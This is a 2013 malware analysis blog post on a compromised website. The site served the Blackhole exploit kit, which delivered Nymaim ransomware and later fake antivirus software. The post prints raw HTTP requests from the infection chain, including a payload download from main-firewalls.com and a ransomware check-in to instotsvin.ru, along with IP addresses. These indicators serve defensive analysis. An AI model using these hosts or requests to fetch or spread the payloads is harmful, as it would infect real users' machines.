Seeing as the website runs Apache version 2.2.3, released July 28 2006, and the HTTP headers kindly sends out 'X-Powered-By: PleskLin' its safe to say the site was compromised with the use of Darkleech.@MalwareMustDie @campbellclaret Ouch....BHE redirect on alastaircampbell{.}org http://t.co/gnhLZ4fnWW best clean that up...
— CwacCwac (@CwacCwac) September 30, 2013
And as is typical for Darkleech users: the website serves the Blackhole exploit kit with a ransomware payload. The infection process:
The redirect to Blackhole was 'hidden' at the top of one of the Wordpress jquery includes: wp-includes/js/jquery/jquery.js?ver=1.10.2.
Blackhole:
GET /ac29f5935614fa1908bc610e2403d62c/software-eastern.php HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: hxxp://www.alastaircampbell .org/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Accept-Encoding: gzip, deflate Host: 67.228.168.250 DNT: 1 Connection: Keep-Alive
Payload:
GET /6.exe HTTP/1.0 Host: main-firewalls.com Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
The payload hosted on main-firewalls.com is the Nymaim ransomware, which has apparently taken a turn for the worse by showing the infected person (child) porn and beastiality pictures that were allegedly visited by the victim.
Much like the most recent version of Revoyem does, although Revoyem's pictures leave much less to the imagination.
The ransomware POST's to the russian domain instotsvin.ru (hosted on 208.115.114.69) to confirm the infection and retrieve the lock screen template:
POST /M8eori?EedoREFmhcuXm=uVqiAdENJTHSO&svGLYCeYnJhO=HjNkMDXOQEhI HTTP/1.1 Host: instotsvin.ru Content-Length: 88 Accept-Encoding: deflate Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Pragma: no-cache Cache-Control: no-cache Connection: close filename=jbirgf.wfw&data=.....M..-2...n.'.....j...s*<.4....JD..&q......%..{;.uj...}.>J..
After testing, more POST's to 69.88.46.245 and 24.156.8.65 were also observed.
Below is an example of what the (Dutch) infection looks like, with the disturbing pictures blurred out.
This seems to be the default lockpage as Nymaim is also able to load a more user specific page by searching for active torrent clients (Azureus, uTorrent, Mediaget, BitTorrent, BitComet) and for files with these extensions: .doc, .xls, .psd, .bmp, .jpg, .mpg, .mov, .rtf, .fla and .mp3. This information will then be stored in compdata.js to be included on the lock page:
All credits to Jean-Ian Boutin and http://www.welivesecurity.com for the above info.
VirusTotal (16/46) for the dropper (6.exe):
https://www.virustotal.com/nl/file/e2d9c27f00a7a9743b088948fde6dcd0a08894e12001b292992b9c774311a610/analysis/1380553090/
VirusTotal (18/48) for Nyamaim infection (2767218.exe):
https://www.virustotal.com/nl/file/e2d9c27f00a7a9743b088948fde6dcd0a08894e12001b292992b9c774311a610/analysis/1380553177/
According to other analysis and infection testing it appears that the first stage of Nymaim is currently always named 6.exe!
After Blackhole was done spreading ransomware, it started spreading fake anti virus malware by the name of "Security Cleaner Pro".
Very detailed analysis of this FakeAV can be found at http://blog.0x3a.com/post/63080734846/analysis-of-the-security-cleaner-pro-fake-antivirus
For a more in depth analysis of the Nymaim: http://www.welivesecurity.com/2013/08/26/nymaim-obfuscation-chronicles
Though alastaircampbell{.}org is no longer serving the exploit kit, the website still seems just as vulnerable as last week so I wouldn't advise visiting the site.